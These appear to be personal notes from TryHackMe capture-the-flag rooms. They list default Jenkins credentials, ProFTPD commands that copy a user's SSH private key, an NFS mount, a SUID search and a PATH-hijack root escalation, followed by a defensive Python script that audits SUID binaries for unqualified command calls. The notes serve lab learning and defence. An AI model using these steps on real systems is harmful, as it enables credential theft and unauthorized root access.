
Ethical Hacking

Jenkins Alfred

Default creds admin:admin.

Steel Mountain

With the CanRestart option set to true, we can restart a service on the system, and the application's directory is also writable. This means we can replace the legitimate application with our malicious one and restart the service, which will then run our infected program! Note: the service also showed up as unquoted (and could be exploited using that technique); in this case, however, we exploited weak file permissions on the service files instead.

Temp Notes for Red Teaming

Kenobi

https://tryhackme.com/room/kenobi

📕 RTFM

smbclient //10.10.206.61/anonymous
smbget -R smb://10.10.206.61/anonymous

nc ftp.server.com 21

# ProFTPD
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

searchsploit <app_name> <app version>

mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS


ssh -i id_rsa kenobi@10.10.206.61

# Find SUID/SGID files
find / -perm -u=s -type f 2>/dev/null

strings /usr/bin/menu

echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu

Say, for example, that some utility has the SUID bit set. That means the utility runs with elevated permissions. You might get lucky: check the executable with strings for the commands it runs. If you see a system utility called without a full path, you can create a script with the same name in a directory placed first in PATH (/tmp in the commands above), and it will be run instead.
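
The same check turned into an audit, as an added example that is not part of the original notes: it walks a directory, picks out SUID/SGID binaries, and lists embedded strings that start with a bare command name so they can be rewritten with absolute paths. The function names, the trusted-directory list and the sample bytes are assumptions made for this example.

```python
import os
import re
import stat

# Printable-ASCII runs of 4+ bytes: the same default that `strings` uses.
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# Assumption: commands are expected to come from these root-owned directories.
TRUSTED_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin")
# Constructed sample standing in for a binary's contents (not from a real file).
SAMPLE = b"\x7fELF\x02\x01\x00curl -I localhost\x00/usr/bin/id -u\x00Enter choice:\x00"

def known_commands(dirs=TRUSTED_DIRS):
    """Names of the executables shipped in the trusted directories."""
    return {n for d in dirs if os.path.isdir(d) for n in os.listdir(d)}

def unqualified_calls(data, known):
    """Embedded strings starting with a bare command name (resolved via PATH)."""
    hits = []
    for match in PRINTABLE.finditer(data):
        words = match.group().decode("ascii").split()
        if words and words[0] in known:
            hits.append(" ".join(words))
    return hits

def is_setid(path):
    """True for a regular file with the SUID or SGID bit set."""
    mode = os.lstat(path).st_mode
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))

def audit(root="/usr/bin"):
    """Map each set-id binary under root to its suspicious strings."""
    known, report = known_commands(), {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if is_setid(path):
                    with open(path, "rb") as fh:
                        hits = unqualified_calls(fh.read(), known)
                    if hits:
                        report[path] = hits
            except OSError:
                continue  # unreadable or vanished file
    return report

if __name__ == "__main__":
    print(unqualified_calls(SAMPLE, {"curl", "id"}))  # constructed sample
    for path, hits in audit().items():
        print(path, hits)
```

The match is a heuristic, so each hit needs a manual look: ordinary messages that begin with a word that is also a command name will show up too.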